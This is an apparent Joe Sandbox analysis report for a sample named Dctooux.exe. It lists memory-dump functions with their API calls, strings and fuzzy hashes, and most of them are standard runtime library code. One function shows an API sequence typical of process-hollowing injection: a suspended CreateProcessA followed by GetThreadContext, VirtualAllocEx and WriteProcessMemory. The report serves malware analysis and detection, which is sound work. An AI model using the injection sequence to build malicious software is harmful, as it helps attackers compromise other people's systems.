Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00A7CD9E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7CDB1

Strings

pContext, xrefs: 00A7CDA9

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 640362b7e7d883ec7d2581a81996fbbdd826c970974b90ffed560a8e0e299a3b
Instruction ID: f65a401a6db1c5169166803dc1ecd193d8bfbed684508f8081f7732c46ce7013
Opcode Fuzzy Hash: 640362b7e7d883ec7d2581a81996fbbdd826c970974b90ffed560a8e0e299a3b
Instruction Fuzzy Hash: 3FE09B35B0020867CE00BB64DD0689DB7BD6ED57107454415B52963282DB74EE09C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A7491C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7494C

Strings

version, xrefs: 00A74931
pScheduler, xrefs: 00A74944

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 545b05bf0d5e2e025d838734b389ad37949e5e5123c5ca96522b2058e412829f
Instruction ID: 7adece41756a607bfad927d484e01b949b0d0fd98a350ce57a91aad25cca1281
Opcode Fuzzy Hash: 545b05bf0d5e2e025d838734b389ad37949e5e5123c5ca96522b2058e412829f
Instruction Fuzzy Hash: DBE08631940208B6CF14FB54DD0ABDE7778AB29744F10C425B519130D5D7B8D688CA91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Dctooux.exePID: 6448, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	76
Total number of Limit Nodes:	3

Executed Functions

Function 00A59DA0 Relevance: 24.7, APIs: 16, Instructions: 655COMMON

Download Yara Rule

APIs

Part of subcall function 00A58ED0: GetTempPathA.KERNEL32(00000104,?,F037EC41,?,00000000), ref: 00A58F17

GetFileAttributesA.KERNEL32(00000000), ref: 00A59E13

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID:
API String ID: 3199926297-0
Opcode ID: e52cc6f8fb8c07089ecbacb9f74e3fc6840adaf4c0041cc6ca1e5500ccd8f6d4
Instruction ID: bbf77e59e34d17061b6ea57789d4594ec2f68a8357aafb14729a2a6bf8eb67d0
Opcode Fuzzy Hash: e52cc6f8fb8c07089ecbacb9f74e3fc6840adaf4c0041cc6ca1e5500ccd8f6d4
Instruction Fuzzy Hash: 4542D170E00248DBEF14EBB8C6497DEBBB2BB16315F644708D811772D2D7B54A49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A8797B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00A8797A,?,?,?,?,?,00A889CE), ref: 00A8799D
TerminateProcess.KERNEL32(00000000,?,00A8797A,?,?,?,?,?,00A889CE), ref: 00A879A4
ExitProcess.KERNEL32 ref: 00A879B6

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1e00279edf65f101b5772fa0e5dc8310b2961c4246696db57e021b9e76d4f59b
Instruction ID: 3f8d84b6fbb74f27e2cb332a7e9db34ccf3b761129bc4b6c9c82529d0d7047dd
Opcode Fuzzy Hash: 1e00279edf65f101b5772fa0e5dc8310b2961c4246696db57e021b9e76d4f59b
Instruction Fuzzy Hash: ADE08C31005108AFCF12BF98CD0CA4C3B29FB81391F208414F90986131DB36DC93DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C55D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 00A8C5B4
ext-ms-, xrefs: 00A8C5C8

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 264b05d1c7f691efa5cb57f0c1d46bc6d0b976c7195b935743faf7e80d620238
Instruction ID: 4e2ca8b8c3654359837e4e9c686063a9ff8e6f74b4f3e8f5142fa5d1464c15cb
Opcode Fuzzy Hash: 264b05d1c7f691efa5cb57f0c1d46bc6d0b976c7195b935743faf7e80d620238
Instruction Fuzzy Hash: D721C371A41211BBCF26AB689C44B6A3768AF05BB0F251530E805B72D1E730ED008FF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C624 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d86a9026838acd1e9cf8bd3c52fb73065fa47b7d4b13f6fb2bd46e5d986ba6
Instruction ID: ea7deb33ddb69590417ad1196316c3da654eb0c5a5e04236e43dba509b42debd
Opcode Fuzzy Hash: 93d86a9026838acd1e9cf8bd3c52fb73065fa47b7d4b13f6fb2bd46e5d986ba6
Instruction Fuzzy Hash: 7101B537A105119FDB16FF7DED40A5A33A6EB85770725A230F904CB1A5EA30D802AFE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A574F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00A5751D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00A5757B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00A57594
GetThreadContext.KERNEL32(?,00000000), ref: 00A575A9
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00A575C9
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00A5760B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00A57628
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A576E1

Strings

VUUU, xrefs: 00A57391
, xrefs: 00A575C0
invalid stoi argument, xrefs: 00A574E0

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 4164879def9eb3691a6dcc32345ec01fe6ee832353b0e5d4be9f59f3df225772
Instruction ID: 4f71a812f285e95d0a818dea5eee924e5ecb87900d52283b33ec95fb37000d3e
Opcode Fuzzy Hash: 4164879def9eb3691a6dcc32345ec01fe6ee832353b0e5d4be9f59f3df225772
Instruction Fuzzy Hash: C1418E70244702BFE320DB64DC09F5ABBE8FF88B11F000429FA45A65E0D7B0A915CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00A72263 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A72366
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A723B2

Part of subcall function 00A73AAD: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00A73BA0

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00A7241E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A7243A
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A7248E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A724BB
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00A72511

Strings

(, xrefs: 00A72372

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 746967dcfd10787ed4e99eee62c9ba7ac4153a9a0a49c4d04745d1494f1f95ba
Instruction ID: 02ed7a18e74580182823f602128ca31dcee33fbe7c1415a66efa54795d681418
Opcode Fuzzy Hash: 746967dcfd10787ed4e99eee62c9ba7ac4153a9a0a49c4d04745d1494f1f95ba
Instruction Fuzzy Hash: F7B15D71A00611AFDB28CF68DD91B7AB7B9FB44300F15C16EE849AB651D734ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A72A52 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7414C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A7415F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00A72A64

Part of subcall function 00A7425F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00A74289
Part of subcall function 00A7425F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00A742F8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00A72B96
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A72BF6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A72C02
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00A72C3D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A72C5E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A72C6A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00A72C73
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00A72C8B

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 6561f6b3725f526fc39d54fd936c0cf814d74fc914b84fd6982e12b6605ba88c
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 93815B71E006259FCB19DFA9C984A6DB7F6FF88304B15C6ADE409AB705C770AD42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A80098 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A800D1

Part of subcall function 00A7A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A7A3A0

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A80137
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00A8014F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00A8015C

Part of subcall function 00A7FBFF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A7FC27
Part of subcall function 00A7FBFF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A7FCBF
Part of subcall function 00A7FBFF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A7FCC9
Part of subcall function 00A7FBFF: Concurrency::location::_Assign.LIBCMT ref: 00A7FCFD
Part of subcall function 00A7FBFF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A7FD05

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: b4a3eb57fa465ed9cd28bd0656754c986c959954e800aef1f0d47b042c9fd576
Instruction ID: d7b45fff77c19cecab95bf25b852a024e290596df20f4543d2bce6d84e1f354b
Opcode Fuzzy Hash: b4a3eb57fa465ed9cd28bd0656754c986c959954e800aef1f0d47b042c9fd576
Instruction Fuzzy Hash: 0A519031A00205DBDF15EFA4CD99FAEB771AF45710F144168E9067B392CB70AE0ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6DBB8 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A6DBBE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A6DBCC
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A6DBDD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A6DBEE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A6DBFF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A6DC10
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00A6DC21
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A6DC32
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00A6DC43
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A6DC54
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A6DC65
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A6DC76
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A6DC87
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A6DC98
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A6DCA9
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A6DCBA
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A6DCCB
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00A6DCDC
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00A6DCED
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00A6DCFE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00A6DD0F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00A6DD20
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00A6DD31
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00A6DD42
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00A6DD53
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A6DD64
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A6DD75
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00A6DD86
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6DD97
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6DDA8
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00A6DDB9
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A6DDCA
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00A6DDDB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A6DDEC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00A6DDFD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00A6DE0E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00A6DE1F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00A6DE30
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00A6DE41
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00A6DE52
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00A6DE63

Strings

CloseThreadpoolTimer, xrefs: 00A6DC8D
FreeLibraryWhenCallbackReturns, xrefs: 00A6DCE2
SetThreadpoolWait, xrefs: 00A6DCAF
ReleaseSRWLockExclusive, xrefs: 00A6DDE1
CloseThreadpoolWait, xrefs: 00A6DCC0
CreateThreadpoolWait, xrefs: 00A6DC9E
kernel32.dll, xrefs: 00A6DBB9
GetCurrentPackageId, xrefs: 00A6DD15
CreateSemaphoreExW, xrefs: 00A6DC49
GetLocaleInfoEx, xrefs: 00A6DE47
CloseThreadpoolWork, xrefs: 00A6DE25
SleepConditionVariableCS, xrefs: 00A6DD9D
LCMapStringEx, xrefs: 00A6DE58
InitializeConditionVariable, xrefs: 00A6DD6A
SubmitThreadpoolWork, xrefs: 00A6DE14
AcquireSRWLockExclusive, xrefs: 00A6DDBF
FlushProcessWriteBuffers, xrefs: 00A6DCD1
WakeConditionVariable, xrefs: 00A6DD7B
WaitForThreadpoolTimerCallbacks, xrefs: 00A6DC7C
CompareStringEx, xrefs: 00A6DE36
CreateThreadpoolTimer, xrefs: 00A6DC5A
SetThreadpoolTimer, xrefs: 00A6DC6B
CreateEventExW, xrefs: 00A6DC27
GetTickCount64, xrefs: 00A6DD26
InitOnceExecuteOnce, xrefs: 00A6DC16
FlsFree, xrefs: 00A6DBD2
FlsSetValue, xrefs: 00A6DBF4
CreateSemaphoreW, xrefs: 00A6DC38
GetCurrentProcessorNumber, xrefs: 00A6DCF3
TryAcquireSRWLockExclusive, xrefs: 00A6DDD0
InitializeSRWLock, xrefs: 00A6DDAE
SleepConditionVariableSRW, xrefs: 00A6DDF2
GetFileInformationByHandleEx, xrefs: 00A6DD37
InitializeCriticalSectionEx, xrefs: 00A6DC05
GetSystemTimePreciseAsFileTime, xrefs: 00A6DD59
FlsGetValue, xrefs: 00A6DBE3
WakeAllConditionVariable, xrefs: 00A6DD8C
SetFileInformationByHandle, xrefs: 00A6DD48
FlsAlloc, xrefs: 00A6DBC6
CreateThreadpoolWork, xrefs: 00A6DE03
CreateSymbolicLinkW, xrefs: 00A6DD09

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: bc245a1468042b0b50086c7a0ceec5a0cb7088eb7b57ecc33cc7e4e33d2e953e
Instruction ID: 18973c2e992b529bb63484156f794c5a183487b9eb38c9cdd8a144aa5a2a7054
Opcode Fuzzy Hash: bc245a1468042b0b50086c7a0ceec5a0cb7088eb7b57ecc33cc7e4e33d2e953e
Instruction Fuzzy Hash: 2F61EF72956311BBCB10EFFCAC4E9467BA8BB1B7023018A1AB501D71E2DBB85513CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E47E Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00AB8640,00000FA0,?,?,00A6E45C), ref: 00A6E48A
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A6E45C), ref: 00A6E495
